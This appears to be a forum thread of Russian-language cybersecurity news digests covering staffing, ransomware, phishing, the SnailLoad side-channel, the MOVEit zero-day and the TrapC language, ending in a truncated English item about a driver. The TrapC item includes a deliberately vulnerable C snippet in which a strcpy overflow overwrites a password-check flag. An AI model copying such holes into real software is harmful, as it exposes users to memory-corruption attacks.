Исследователи из Command Zero выпустили [отчет](https://www.cmdzero.io/top- challenges-in-cyber-investigations-report) о проблемах, с которыми сталкиваются руководители служб информационной безопасности (CISO) и другие лидеры. Данные были собраны в ходе сотен подробных интервью с профессионалами в области кибербезопасности из 15 отраслей. Исследователи утверждают, что за последние 40 лет определенные инновации стали маркерами для волн «цифровых инноваций», таких как создание Интернета, мобильных телефонов и облачных вычислений. Теперь же последняя волна инноваций пришла в виде искусственного интеллекта (ИИ). Во всех этих сферах преимущества, которые они дают, сопровождаются глубокими проблемами безопасности.
Где таланты, когда они нужны?
Главная и, казалось бы, очевидная проблема - нехватка квалифицированных кадров
в области кибербезопасности, причем во всех дисциплинах, но особенно в области
киберрасследований, говорится в отчете.
Вероятно, это связано с тем, что среднестатистический киберрасследователь должен соответствовать высоким требованиям, чтобы претендовать на такую должность. По мнению исследователей, такие аналитики должны быть «экспертами в предметной области», когда речь идет об анализе, и обладать знаниями об источниках данных на уровне администратора.
Учитывая постоянную нехватку киберпрофессионалов, отвечающих столь высоким требованиям к квалификации и знаниям, существующие команды работают на пределе возможностей, некоторые из них работают на двух работах, чтобы быть в курсе последних угроз. Хотя это и позволяет поддерживать бизнес на плаву, но может привести к выгоранию, упущениям и, в конечном счете, к снижению общей эффективности борьбы с потенциальными угрозами.
Кроме того, для того чтобы накопить столь значительный объем знаний и стать аналитиком такого рода, необходимо работать в среде, которая подчеркивает и поощряет важность постоянного обучения. Однако, по словам исследователей, «это непросто, когда команды постоянно находятся в режиме пожаротушения».
Из-за этой нехватки 88 % опрошенных выразили обеспокоенность оперативными проблемами, связанными с нехваткой персонала, в то время как угрозы продолжают расти. Кроме того, 74 % респондентов заявили, что, по их мнению, их команда не обладает достаточными навыками работы с публичным облаком для проведения «высококачественных расследований».
Три инструмента относятся к числу наиболее широко используемых SecOps командами SOC и IR в отрасли: обнаружение и реагирование на конечные точки и другие атаки (EDR/XDR), управление информацией и событиями безопасности (SIEM), а также оркестровка безопасности, автоматизация и реагирование на атаки безопасности (SOAR). Все три направления ставят перед киберпрофессионалами свои собственные задачи.
EDR/XDR, по мнению исследователей, является наиболее часто используемым инструментом расследования, но он имеет свои ограничения, когда дело доходит до корреляции сетевой и облачной телеметрии. Кроме того, это дорого - использование EDR/XDR «в масштабах облачной среды» может быть дорогостоящим, а это значит, что когда они используются, то не в полной мере реализуют свой потенциал, что приводит к пробелам в видимости.
Около 59 % респондентов указали на расходы на персонал, связанные с использованием SIEM для проведения расследований. Три четверти респондентов сообщают, что у них «не хватает ресурсов и навыков, необходимых для интеграции источников данных в SIEM и SOAR», и некоторые из них прибегают к услугам сторонних организаций для поддержания систем в рабочем состоянии.
Вероятно, между ними существует взаимосвязь, поскольку развертывание, настройка и обслуживание SIEM требует узкоспециализированных навыков; обучение этим навыкам стоит дорого, что делает их дорогостоящими для развития и культивирования, а тем более для укомплектования штата, когда они кажутся столь востребованными.
К сожалению, ни один из этих трех инструментов не обеспечивает 100-процентного охвата всех ИТ-систем. Исследователи рекомендуют компаниям инвестировать в концептуальное и технологическое обучение операциям безопасности и выявлять возможные пробелы в защите.
Кадровый дефицит и вакансии: Что лучше?
Кибер индустрия уже много лет жалуется на нехватку кадров, призывая людей
подавать заявления о приеме на работу в отрасль, которая, как утверждается,
может многое предложить. Но на самом ли деле кто-то нанимает сотрудников? По
всей видимости, да, но соискатели должны быть хорошо квалифицированы.
«Большинство позиций в сфере кибербезопасности требуют междисциплинарного опыта и способностей в области ИТ», - говорят исследователи [отчета](https://www.cmdzero.io/top-challenges-in-cyber-investigations- report), отмечая, что нанять сотрудников непросто. «В отличие от роли системного администратора, которая требует специализации только на одном виде систем, роли специалистов по кибербезопасности требуют фундаментального понимания сетевых технологий, конечных защищаемых устройств, приложений и систем. Это делает эти роли труднодоступными».
Кроме того, существует высокий спрос со стороны многих конкурирующих компаний на одних и тех же квалифицированных специалистов. Это означает, что у таких сотрудников много вариантов, что приводит к большой текучести кадров в бесконечном порочном круге.
Их рекомендации по поиску работы? Ищите киберстажировки и работу с частичной занятостью еще во время учебы в школе, или стремитесь к смежным должностям, чтобы получить опыт.
«Ваш путь в кибербезопасность может лежать через сетевые технологии, системную инженерию или разработку программного обеспечения», - говорят исследователи. «Хотя это может показаться нелогичным, многие специалисты по безопасности начинали свою карьеру в ИТ как неспециалисты по безопасности. Поэтому, начав с должности сетевого специалиста или системного инженера, вы сможете получить междисциплинарный опыт, необходимый для работы в киберпространстве».
источник: [https://www.darkreading.com/cyberse...fing-shortages-remain-cisos- biggest-challenge](https://www.darkreading.com/cybersecurity-operations/cyber- staffing-shortages-remain-cisos-biggest-challenge)
Представьте себе мир, в котором искусственный интеллект способен управлять ядерным оружием и потенциально положить конец нашей планете, какой мы ее знаем.
Китай может быть еще на шаг ближе к этому, потому что страна не подписала соглашение, согласно которому ключевые решения об использовании ядерного оружия должны принимать люди, а не искусственный интеллект.
Около 100 стран со всего мира приняли участие в саммите Responsible AI in the Military Domain (REAIM) в Сеуле, где обсуждалось это соглашение.
Соглашение, заключенное на саммите, организованном Великобританией, Нидерландами, Сингапуром и Кенией, не является юридически обязывающим, но и не было подписано Китаем.
В нем говорится о необходимости «сохранять человеческий контроль и участие во всех действиях... связанных с применением ядерного оружия».
В нем также говорится, что возможности ИИ в военной сфере «должны применяться в соответствии с применимым национальным и международным правом».
Применение ИИ должно быть этичным и ориентированным на человека».
В декларации не говорится о том, какие санкции или другие наказания последуют,
если страна пойдет против ее выводов.
В ней также отмечается, что в связи с развитием ИИ странам «необходимо
провести дальнейшие обсуждения... для выработки четкой политики и процедур».
Посольство Китая в Сеуле не ответило на просьбу о комментарии.
В эпоху, когда конфликты все чаще возникают по всему миру, угроза ядерной войны становится все ближе.
Россия не была приглашена на саммит из-за ее войны на Украине.
Министр обороны Южной Кореи Ким Ён Хён заявил: «Поскольку искусственный
интеллект является приложением
Источник: [https://metro.co.uk/2024/09/10/chin...ent-banning-ai-rule-nuclear- weapons-21581585/](https://metro.co.uk/2024/09/10/china-refuses-sign- agreement-banning-ai-rule-nuclear-weapons-21581585/)
Группа исследователей из Грацкого технологического университета раскрыла подробности новой side-channel атаки SnailLoad, которая позволяет удаленному злоумышленнику узнать, какие сайты и контент просматривает пользователь, не имея прямого доступа к его трафику.
SnailLoad не требует, чтобы злоумышленник предварительно провел атаку man-in- the-middle (MitM), выполнил JavaScript или какой-либо другой код в системе жертвы. Но исследователи показали, что все равно могут вычислить, к каким видеороликам на YouTube и сайтам обращался пользователь.
Для проведения атаки SnailLoad злоумышленник проводит серию измерений задержки (latency) для различных роликов на YouTube и сайтов, которые просматривает жертва. Эти данные позволяют отследить время ожидания, включая специфические временные отклонения для каждого целевого видео или сайта, по сути, осуществляя фингерпринтинг каждого из них.
Затем атакующему нужно вынудить целевого пользователя загрузить данные с вредоносного сервера. Злоумышленник может убедить жертву загрузить некий файл, но атака также сработает с любым другим типом контента, включая таблицы стилей, шрифты, изображения или даже рекламу.
«Основная угроза заключается в том, что любой TCP-сервер может незаметно отследить latency любых клиентов, подключающихся к нему», — объясняют эксперты.
Также важным аспектом атаки является тот факт, что вредоносный сервер должен загружать контент очень медленно (отсюда и происходит название SnailLoad), чтобы злоумышленник мог наблюдать за задержкой в течение длительного периода времени.
То есть атака эксплуатирует тот факт, что серверы обычно имеют быстрое интернет-соединение, в отличие от скорости, с которой трафик достигает систем провайдера или шлюза жертвы, где пакеты передаются с задержкой. Эти узкие места могут использоваться атакующим для измерения latency.
Затем полученные злоумышленником данные сравниваются с результатами проведенного ранее фингерпринтинга, что позволяет выяснить, какие конкретно видео или сайты из списка просматривала жертва во время проведения атаки SnailLoad.
Исследователи отмечают, что злоумышленник может использовать CNN (convolutional neural network) для изучения задержек каждого целевого объекта, а также последующего вычисления каждого сайта или видео.
Эксперты признают, что в нынешнем виде влияние атаки SnalLoad ограничено, так как злоумышленнику необходимо заранее составить список сайтов, которые может посетить жертва. К тому же точность атаки снижается, если жертва выполняет другие операции, помимо просмотра целевого видео или сайта.
В ходе испытаний, проведенных исследователями, которые охватывали 10 видеороликов на YouTube и 100 популярных сайтов, точность атаки варьировалась в диапазоне от 37 до 98% (в зависимости от типа целевого ресурса и типа интернет-соединения).
Более детальную информацию о SnailLoad эксперты планируют представить на ИБ- конференции Black Hat USA 2024 этим летом.
Аналитики Arkham Intelligence зафиксировали конфискацию 3940 BTC (~$249 млн) у наркоторговца Банмита Сингха в пользу правительства США.
Процедуру провели в рамках январского судебного разбирательства. Тогда 40-летний гражданин Индии признал себя виновным в продаже наркотических веществ на даркнет-маркетплейсах и согласился выплатить $150 млн.
Согласно материалам дела, с 2012 по 2017 год Сингх оперировал на уже закрытых платформах Silk Road, Alpha Bay, Hansa и других, принимая оплату в криптовалюте. Он лично организовывал доставку наркотиков в Европу и США по почте.
«Сегодняшнее признание вины, которое включает конфискацию примерно $150 млн в криптовалюте, демонстрирует, что Министерство юстиции намерено привлекать к ответственности преступников, нарушающих законодательство США, независимо от того, как они скрывают свою деятельность», — заявила помощница генерального прокурора Николь Арджентьери.
twitter.com/ArkhamIntel/status/1787671240809013713
Роскомнадзор планирует выпустить приказ, согласно которому с 1 марта 2024 года VPN-сервисы во всех магазинах приложений, включая Play Market и AppStore, будут блокироваться в случае предоставления ими доступа к заблокированным ресурсам, сообщил РИА Новости зампред Совета по развитию цифровой экономики при Совете Федерации, сенатор Артем Шейкин.
"С 1 марта 2024 года вступит в силу приказ, согласно которому VPN-сервисы,
предоставляющие доступ на запрещенные в России сайты, будут заблокированы
Роскомнадзором во всех маркетах", — сказал сенатор.
Он подчеркнул, что этот приказ касается и тех VPN-сервисов, которые дают
доступ, в частности, к запрещенному в России Instagram*.
"Отмечу, что особо важно ограничить доступ граждан к продуктам компании Meta*, которая признана экстремистской организацией", — заключил Шейкин.
Хакеру грозит до 20 лет тюрьмы.
Марокканец обвинен прокуратурой США в том, что он якобы украл четыре невзаимозаменяемых токена (NFT) и криптовалюту на сумму 450 тысяч долларов у жителя Манхэттена в 2021 году. Соуфианс Оулахя, который в настоящее время находится под арестом в Марокко, обвиняется в создании поддельной площадки OpenSea и получении секретной фразы жертвы через спуфинг.
Согласно пресс-релизу прокуратуры Южного округа Нью-Йорка, Оулахя использовал платное объявление на популярном поисковике, чтобы заманить жертву на фальшивый сайт OpenSea. Когда жертва ввела свою секретную фразу на сайте, Оулахя получил ее по электронной почте и использовал ее для доступа к кошельку жертвы. Затем он перевел NFT и криптовалюту на свой собственный кошелек.
Среди украденных Оулахей NFT были по одному из серий Bored Ape Yacht Club, Meebit, Bored Ape Kennel Club и Crypto Dad. Жертва заплатила примерно 448 923 доллара, чтобы приобрести эти цифровые активы. Какие именно криптовалюты были украдены Оулахей, в обвинительном заключении не указывается.
“Как утверждается, Соуфиан Оулахян использовал распространенный киберпреступный метод для кражи криптовалюты и NFT жертвы. ‘Спуфинг’ - один из самых старых приемов в преступном арсенале. Оулахян адаптировал этот старый инструмент для использования в новой и развивающейся сфере - крипто- пространстве”, - заявил прокурор Дамиан Уильямс.
Дело расследуют Департамент юстиции США (DoJ) и Федеральное бюро расследований (FBI). Оулахян обвинен в одном эпизоде мошенничества с использованием электросвязи, за который предусмотрено максимальное наказание в виде 20 лет тюрьмы.
Обвинение выдвигается на фоне всплеска кибератак, направленных на пространство NFT и криптовалюты. В апреле 2022 года владелец Bored Ape Yacht Club был обманут на трех NFT стоимостью 570 тысяч долларов на платформе обмена Swap Kiwi, которая использовала поддельные галочки для создания контрафактных NFT BAYC. Но это были не что иное, как отредактированные в фотошопе Jpeg-файлы.
В октябре 2022 года сеть BNB Chain подверглась нарушению безопасности и потеряла криптовалюты на миллионы долларов. Пока шли процессы замораживания, восстановления и нормализации, новая атака спуфинга причинила сети ущерб в 60 ETH.
Следователями Главного следственного управления ГУ МВД России по г. Санкт- Петербургу и Ленинградской области окончено предварительное расследование уголовного дела в отношении участников организованной группы. Житель Уфы, петербуржец и его сожительница обвиняются в мошенничестве под видом интернет- торговли.
«По версии следствия, злоумышленники действовали с декабря 2020 по апрель 2021 года. Ими руководили анонимные кураторы, которые находились за пределами России. Фигуранты создавали копии известных интернет-сайтов, на которых предлагали приобрести различную бытовую технику и электронику по ценам значительно ниже рыночных.
Непременным условием сделки была полная предоплата товара. Деньги предлагали переводить на банковскую карту частного лица, реквизиты которой указывались на сайте. После того как покупатель совершал транзакцию, продавцы присваивали средства и переставали выходить на связь. От противоправной деятельности пострадали 308 жителей разных регионов России. Общая сумма ущерба составила порядка семи миллионов рублей», - рассказала официальный представитель МВД России Ирина Волк.
В ходе предварительного расследования установлено, что участники группы из Санкт-Петербурга отвечали за поиск граждан, оформлявших на свое имя банковские карты. Их данные передавали фигуранту из Уфы, который переправлял эти сведения для публикации на интернет-сайтах аферистов. В дальнейшем поступающие деньги переводили на другие счета и обналичивали.
После задержания участников криминальной схемы в их квартирах полицейскими проведены обыски. Изъяты банковские карты, средства связи и другие предметы, имеющие доказательственное значение.
«В настоящее время расследование завершено, уголовное дело с утвержденным прокурором обвинительным заключением направлено в Красносельский районный суд города Санкт-Петербурга для рассмотрения по существу», - сообщила Ирина Волк.
Очередная GoAnywhere?
Хакеры активно используют уязвимость нулевого дня в программе передачи файлов MOVEit Transfer для кражи данных у организаций.
MOVEit Transfer — это решение для управляемой передачи файлов (MFT), разработанное Ipswitch, дочерней компанией американской корпорации Progress Software, которое позволяет предприятиям безопасно передавать файлы между деловыми партнерами и клиентами с помощью загрузки на основе SFTP, SCP и HTTP.
Progress MOVEit Transfer предлагается в виде локального решения, управляемого заказчиком, и облачной платформы SaaS, управляемой разработчиком.
По данным Progress, MOVEit используют тысячи предприятий, в том числе Chase, Disney, GEICO и MLB, а также 1700 компаний-разработчиков программного обеспечения и 3,5 миллиона разработчиков.
BleepingComputer стало известно, что злоумышленники использовали нулевой день в программном обеспечении MOVEit MFT для массовой загрузки данных из организаций.
Неясно, когда произошла эксплуатация и какие субъекты угроз стоят за атаками, но BleepingComputer сообщили, что многие организации были взломаны, а данные украдены.
Вчера компания Progress выпустила рекомендации по безопасности, предупреждающие клиентов о «критической» уязвимости в MOVEit MFT, предлагая меры по ее устранению на время тестирования исправления.
«Progress обнаружил уязвимость в MOVEit Transfer, которая может привести к эскалации привилегий и потенциальному несанкционированному доступу к среде», — говорится в бюллетене по [безопасности](https://community.progress.com/s/article/MOVEit-Transfer- Critical-Vulnerability-31May2023) от Progress.
«Если вы являетесь клиентом MOVEit Transfer, крайне важно, чтобы вы немедленно предприняли действия, как указано ниже, чтобы помочь защитить вашу среду MOVEit Transfer, пока наша команда выпускает исправление».
Поскольку исправление недоступно во время его тестирования, Progress выпустила меры, которые администраторы MOVEit могут использовать для защиты своих установок.
Во избежание эксплуатации разработчики предупреждают администраторов о блокировке внешнего трафика на порты 80 и 443 на сервере MOVEit.
Progress предупреждает, что блокировка этих портов предотвратит внешний доступ к веб-интерфейсу, помешает работе некоторых задач автоматизации MOVEit, заблокирует API и помешает работе подключаемого модуля Outlook MOVEit.
Однако протоколы SFTP и FTP/s можно по-прежнему использовать для передачи файлов.
Разработчики также предупреждают администраторов, чтобы они проверяли c:\MOVEit Transfer\wwwroot\папку на наличие неожиданных файлов, включая резервные копии или загрузки больших файлов.
Согласно информации, полученной BleepingComputer, большие загрузки или неожиданные резервные копии являются вероятными индикаторами того, что злоумышленники украли данные или находятся в процессе этого.
Информации об уязвимости нулевого дня не поступало. Однако, судя по заблокированным портам и указанному местоположению для проверки наличия необычных файлов, уязвимость, скорее всего, связана с веб-уязвимостью.
До тех пор, пока не будет выпущено исправление, организациям настоятельно рекомендуется отключать любые передачи MOVEit и проводить тщательное расследование на предмет компрометации, прежде чем применять исправление и снова запускать сервер.
Хотя Progress не заявлял, что уязвимость активно эксплуатируется, BleepingComputer известно о многочисленных организациях, у которых были украдены данные с использованием нулевого дня.
На данный момент злоумышленники не начали вымогать деньги у жертв, поэтому неясно, кто стоит за атаками.
Тем не менее, эксплуатация очень похожа на массовую эксплуатацию сервера нулевого дня GoAnywhere MFT в январе 2023 года и эксплуатацию серверов нулевого дня Accellion FTA в декабре 2020 года .
Оба этих продукта представляют собой управляемые платформы для передачи файлов, которые активно использовались бандой вымогателей Clop для кражи данных и вымогательства у организаций.
BleepingComputer связался с Progress, чтобы узнать больше об атаках, но ответ был получен не сразу.
взято: https://www.bleepingcomputer[.]com/...ero-day-mass-exploited-in-data- theft-attacks/
Зная, что годовой доход мужа составляет 3 млн долларов, деваха обратила внимание на относительную скудность активов, раскрытых её мужем
Выяснилось, что у супруга есть крипто-кошель, на котором хранится 12 биткоинов
Мораль сей басни такова: если соберётесь последовать примеру этого горе- махинатора, помните, что уже существует целый пул «охотников за криптовалютами», которые всеми доступными способами отслеживают подобные вложения.
«Мы не смогли их сдержать, и они зашифровали серверы. Мы отключили все министерство».
Глава управления цифровыми технологиями Коста-Рики Джордж Мора в апреле получил сообщение от одного из своих чиновников:
«Мы не смогли их сдержать, и они зашифровали серверы. Мы отключили все министерство».
Click to expand...
Кибератака известной российской группировки Conti началась 18 апреля с министерства финансов Коста-Рики и в конечном итоге охватила 27 различных учреждений в результате серии взаимосвязанных атак, которые разворачивались в течение нескольких недель.
Conti предложила вернуть данные за $10 млн., но правительство Коста-Рики отказалось платить выкуп. Вместо этого новый президент Родриго Чавес объявил чрезвычайное положение в стране и начал охоту на предполагаемых участников группы внутри страны.
«Мы находимся в состоянии войны, и это не преувеличение», — сказал Чавес через несколько дней после своей инаугурации в середине мая и обвинил предыдущую администрацию в сокрытии истинных масштабов кибератак, которые он сравнил с терроризмом.
Атаки группы парализовали систему сбора налогов, нарушили работу инфраструктуры системы здравоохранения и лишили зарплаты некоторых государственных работников. Костариканцы не могли получить полноценную медицинскую помощь, поскольку электронные системы больниц были отключены .
Родриго Чавес обратился за помощью к более технически подкованным союзникам США и Испании. Для помощи Коста-Рике Испания прислала собственное ПО для защиты от программ-вымогателей MicroClaudia, разработанное Национальным криптологическим центром Испании (Centro Criptológico Nacional, CCN).
США бесплатно предоставили ПО от Microsoft, IBM и Cisco, а Госдепартамент США предложил вознаграждение в размере до $15 млн. за поимку хакеров, чтобы привлечь участников Conti к ответственности. На данный момент системы министерства финансов уже восстановлены, в том числе таможня и система выдачи зарплат.
Однако, после атаки на Коста-Рику группировка Conti распалась . Самая результативная и крупная атака Conti оказалась последней. По словам исследователей безопасности, в конце июня общедоступный веб-сайт Conti и сайт переговоров в даркнете были закрыты.
«Кампания Conti в Коста-Рике была отчаянной последней попыткой получить какой- либо титул, что вызвало ажиотаж вокруг их действий», — сказал Шмуэль Гихон, исследователь безопасности израильской компании Cyberint.
«В прошлом наша страна не относилась к этой теме так серьезно, как это требовалось. Какой урок мы извлекли? Не экономьте на обеспечении необходимой кибербезопасности во всех учреждениях », - признал Карлос Альварадо Брисефио, министр наук, инноваций, технологий и телекоммуникаций.
На многих подпольных форумах есть специальная система для разрешения споров между киберпреступниками.
Исследователи из аналитической компании Analyst1 проанализировали работу нескольких крупных хакерских форумов и обнаружили, что по крайней мере на двух из них действует неформальная судебная система, где преступники могут подавать жалобы и улаживать споры со своими коллегами. Десятки дел в даркнете ежедневно передаются в эти суды и ждут, пока члены администрации форума уладят споры.
Эксперты насчитали более 600 тем, относящихся к делам в подпольных судах. Суммы спора в таких случаях обычно варьировались от нескольких сотен до нескольких тысяч долларов, хотя в некоторых случаях возникали споры по поводу гораздо более высоких сумм. Например, в апреле 2021 года партнеру группировки Conti был предъявлен «иск» на $2 млн за невыполнение соглашения о взломе и шифровании данных школьной системы в США.
Как сообщили исследователи, злоумышленники могут подавать иски друг против друга по разным причинам. В качестве одного из примеров указывался злоумышленник, который приобрел доступ к скомпрометированной сети у брокера доступа и обнаружил, что доступ был ранее продан другому злоумышленнику.
«Истец» предоставляет подробную информацию о претензии, такую как псевдоним брокера, ссылку на свою контактную информацию в таких сервисах, как Jabber и Telegram, а также доказательства, включая журналы чата, снимки экрана и транзакции, связанные с предполагаемым нарушением. Затем к делу назначается арбитр, который изучает подробности и выслушивает встречные иски предполагаемого нарушителя. Суд хакеров дает право каждому участнику форума участвовать в процессе, но окончательное решение принимает только арбитр.
Когда решение принимается в пользу истца, у «ответчика» есть определенное количество времени на исправление ситуации или он получит запрет на любую будущую деятельность на форуме. Потеря доверия или запрет на доступ к форуму могут иметь огромное негативное влияние на способность злоумышленника действовать в киберподполье. В некоторых случаях раскрывается истинная личность киберпреступника, включая адрес, профили в социальных сетях и номера телефонов.
«Если обвиняемый будет признан виновным, его могут исключить из сообщества, выставить на общественную стену стыда и сообщить о его плохой репутации другими подпольным синдикатам», — пояснили эксперты.
source: analyst1.com/blog/dark-web-justice-league
Издание Bleeping Computer сообщает, что в Twitter пользователей кошельков Trust Wallet и MetaMask активно атакуют фишеры, выдающие себя за техническую поддержку. Цель данной кампании — кража криптовалюты пользователей.
Мобильные приложения MetaMask и Trust Wallet позволяют создавать кошельки для хранения, покупки, отправки и получения различной криптовалюты и NFT. Когда пользователь впервые запускает любое из приложений, ему предлагают создать новый кошелек. В рамках этого процесса нужно будет придумать фразу для восстановления, состоящую из 12 слов, и сохранить ее в безопасном месте, ведь фраза нужна для создания приватных ключей для доступа к кошельку. То есть любой, кто знает эту фразу, может импортировать кошелек на свое устройство и использовать хранящиеся в нем средства.

Около двух недель в Twitter идет вредоносная кампания. Всё начинается с того, что обычный и настоящий пользователь MetaMask или Trust Wallet жалуется в социальной сети на некую проблему, с которой столкнулся (от кражи средств и проблем с доступом к кошельку, да трудностей с использованием приложения).
Мошенники оперативно отвечают на такие твиты, выдавая себя за службу поддержки приложения, или за другого пользователя, который уверяет, что «Мгновенная поддержка» недавно помогла ему с точно такой же проблемой. В сообщениях будущим жертвам рекомендуют перейти на ссылке на docs.google.com или forms.app, чтобы заполнить заявку в поддержку и получить помощь.


После перехода по ссылке пользователь увидит фишинговую страницу, якобы предназначенную для заполнения заявки в поддержкуTrust Wallet или MetaMask. Здесь у жертвы спросят адрес электронной почты, имя, попросят описать проблему, а затем потребуют указать фразу для восстановления кошелька, состоящую из 12 слов.

Если доверчивый пользователь попадается на удочку мошенников и сообщает им свою фразу, злоумышленники могут импортировать кошелек жертвы на свои устройство и похитить всю криптовалюту.
Журналисты отмечают, что в такой ситуации поделать можно очень мало, и пострадавшие вряд ли сумеют вернуть свои средства. Издание подчеркивает, что фразу для восстановления кошелька ни в коем случае нельзя сообщать никому, ни на каких сайтах или в приложениях.
Источник: xakep.ru/2021/05/13/trust-wallet-metamask-phishing/
Стартап Trasec развивает язык программирования TrapC, представляющий собой диалект языка Си, обеспечивающий безопасную работу с памятью. Для блокирования ошибок при работе с памятью, таких как выход за границы выделенного буфера и обращение к уже освобождённой памяти, в TrapC применяется фундаментально иной способ работы с указателями и специальный механизм перехвата ошибок на основе обработчиков исключений (trap). Исходный код компилятора для TrapC планируют открыть в 2025 году.
Заявлено, что особенности работы с указателями по возможности не будут нарушать привычный уклад и будут реализовываться силами компилятора. По задумке авторов языка компилятор будет гарантировать, что указатели ссылаются только на связанные с ними области памяти, а также проверять все границы буферов. Компилятор запоминает типы и не допускает небезопасное приведение типов. Все создаваемые переменные и буферы явно инициализируются или заполняются нулями компилятором.
Вместо malloc в TrapC используется похожий на C++ конструктор new. Вызовы free и delete отсутствуют, а за освобождение памяти отвечает компилятор, что защищает от ошибок, приводящих к утечке памяти. В куче применяется инкрементальное автоматическое управление памятью, но без сборщика мусора. На уровне ABI TrapC будет совместим с Си, что позволит комбинировать в одном приложении код на TrapC и чистом Си, но для кода Си не будет обеспечиваться безопасность работы с памятью.
Подробности о проекте пока не приводятся, показано лишь несколько примеров с кодом, в котором, например, заявлено, что TrapC не даст переполнить буфер buff при выполнении "strcpy(buff, argv[1]);" или не даст увеличить указатель или индекс массива на значение, смещающее его за пределы выделенного буфера или конца массива. Как именно достигается подобная защита не поясняется.
Дополнение: Опубликована видеозапись презентации языка TrapC, анонсированного на проходящей в Бангкоке конференции W2140.
Примеры кода:
Spoiler
C:Copy to clipboard
// darpa_tractor.c
int main(int argc,char* argv[])
{
char buff[8]; // TrapC implicitly zeros, no dirty memory
int success = 0; // In C, buffer overwrite corrupts success
strcpy(buff,argv[1]); // TrapC cannot overrun, strcpy safe
if(!strcmp(buff, "s3cr8tpw"))
{
success = 1;
}
if(success) // TrapC blocked strcpy overwrite, success good
{
printf("Welcome!\n");
}
return !success;
}
// trapc_ptr.c
int main()
{
const char* ptr = "Hello World"; // 12 char wide
while(ptr) // No buffer overrun with TrapC
{
printf("%c", *ptr); // print one char at a time
ptr++; // Steps off the end: TrapC nulls ptr!
} // Do NOT attempt this in C, will segfault!
assert(ptr == 0);
return 0;
}
// trapc_array.c
int score[10];
printf("%i", score[-1]); // TrapC will not allow access
for(int i = 0; i <= INT_MAX; i++) // C Undefined Behavior
{
printf("%i", i);
}
// In C, above code is an infinite loop, will not stop.
// TrapC blocks i++ overflow wrap-around, stops.
// TrapC will fail-safe, call error handler if defined.
Источник: opennet.ru
Компания Rhysida Group недавно опубликовала на своем сайте данные, содержащие резервные копии прокурорских и криминальных баз данных, похищенных в ходе вымогательской атаки на город Колумбус, штат Огайо, после того как 8 августа они не получили оплату от правительства.
На пресс-конференции 13 августа мэр Колумбуса Эндрю Гинтер заявил прессе, что похищенные данные были зашифрованы, испорчены и поэтому бесполезны. Однако это ложное утверждение заставило исследователя безопасности по имени Коннер Гудвульф сообщить местным СМИ, что данные не были зашифрованы и были легко доступны, предоставив доказательства, подтверждающие его слова.
Бывший главный прокурор Колумбуса, штат Огайо, бывший председатель городского
совета Колумбуса Зак Кляйн и нынешний пользователь reddit «u/CityAttyKlein»
решили подать на Коннера в суд за небрежное обращение с конфиденциальными
данными и потребовали 25 000 долларов компенсации, защищая свои действия от
публичных насмешек в Интернете. Ему также удалось добиться судебного запрета
на дальнейшее распространение раскрытых данных среди любых новостных
организаций, демонизируя Коннера как человека с «продвинутыми хакерскими
навыками» только за то, что он воспользовался Tor и перешел по ссылке.
источник: [https://www.securityweek.com/city-o...er-who-disclosed-impact-of-
ransomware-attack/](https://www.securityweek.com/city-of-columbus-sues-
researcher-who-disclosed-impact-of-ransomware-attack/)
Британские правоохранительные органы арестовали и допросили женщину и мужчину по подозрению в организации незаконной криптовалютной биржи, через которую прошло свыше $1 млрд в цифровых активах.
Как сообщает издание Sky News, сотрудники Управления по финансовому надзору Великобритании (FCA) проводят обыски в лондонских офисах, принадлежащих подозреваемым. Также прошли изъятия цифровых устройств в их квартирах. После допроса полиция отпустила 38-летнюю женщину и 44-летнего мужчину под залог, при этом следствие продолжается.
«FCA играет важную роль в предотвращении попадания грязных денег в финансовую систему Великобритании. Эти аресты показывает, что мы делаем все, что в наших силах, чтобы остановить незаконную деятельность криптофирм в стране», ― заявила руководитель отдела правоприменения и надзора FCA Тереза Чемберс (Therese Chambers).
Напомним, что криптовалютные компании в Великобритании должны получать лицензию. Пока в стране легально работает 45 фирм. Однако, по данным регуляторов, в Британии может нелегально работать до 13 000 криптофирм.
Как установили правоохранители, 28-летний житель областного центра размещал в одной из социальных сетей объявление о трудоустройстве в Германии, а после получения средств от потенциальных клиентов не выполнял обещанного.
Работники отдела противодействия киберпреступлениям в Хмельницкой области Департамента киберполиции НПУ разоблачили жителя г. Хмельницкого, который обманывал граждан под предлогом трудоустройства на заводах и фабриках Германии. Объявление о своих услугах мужчина размещал в одной из социальных сетей. Главным условием для клиентов была полная подписка за получение пакета документов по трудоустройству. И после получения средств злоумышленник не выходил на связь.
По месту жительства фигуранта полицейские провели санкционированный обыск, во время которого изъяли мобильные терминалы, компьютерную технику с учетными записями, с которых размещались объявления о предоставлении услуг по трудоустройству за рубежом, а также банковские карты, на которые потерпевшие перечисляли денежные средства, сим-карты различных мобильных операторов. Изъятую технику правоохранители направили на экспертизы, по результатам которых будет решаться вопрос об объявлении мужчине подозрения.
Расследование по ч. 1 ст. 190 (Мошенничество) Уголовного кодекса Украины осуществляют дознаватели Хмельницкого райуправления полиции. Также полицейские работают над установлением всех потерпевших и нанесенного им ущерба.
Google объявил, что с декабря этого года компания начнёт удалять аккаунты, которые не использовались в течение как минимум 2 лет. Сюда входит весь контент, связанный с Gmail, Docs, Drive, Meet, Calendar, YouTube, and Google Photos. По словам корпорации, это поможет защитить пользователей от угроз безопасности.
Многочисленные уведомления на основной адрес электронной почты аккаунта и резервный адрес электронной почты (при наличии) будут отправлены в течение нескольких месяцев перед удалением учетной записи. Удаления аккаунтов коснутся только личных учетных записей Google и не будут применяться к бизнес-клиентам.
Согласно новой политике корпорации , учетная запись Google будет считаться активной, если пользователь входил в нее не реже одного раза в 2 года. Такие аккаунты не подвержены удалению.
Компания утверждает, что обновления политики помогут предотвратить угрозы кибербезопасности, такие как рассылка спама, фишинг и захват учетных записей.
По данным Google, неактивные учетные записи часто используют устаревшие или повторно используемые пароли, которые могли быть скомпрометированы. Кроме того, в таких аккаунтах часто отсутствует двухфакторная аутентификация и меньше проверок безопасности со стороны пользователя. Такие аккаунты могут быть взломаны и стать инструментом для различных вредоносных действий, начиная от кражи личных данных и заканчивая распространением вредоносного контента.
Прямо чувствую, насколько вдохновлены эти двое ребят подобными действиями:
"Приходите к нам в инфосек, у нас есть печеньки" (ц).
11:27 / 19 May, 2021
The driver checks all the names of running processes on the system and
compares them with a list of 19 video games.
Cybersecurity researcher (Alex Ionescu) has
identified a
disguised AMD driver on his Windows 10 test computer. The driver is able to
change the system settings depending on what video games are running on the
device. According to the information security expert, such actions can cause
problems for the cybersecurity of the system and allow the exploitation of
vulnerabilities.
Ionescu found the AMDPciDev.sys file, WHQL certified as a PnP PCI driver and installed in the operating system as a "dummy PCIe function" device.
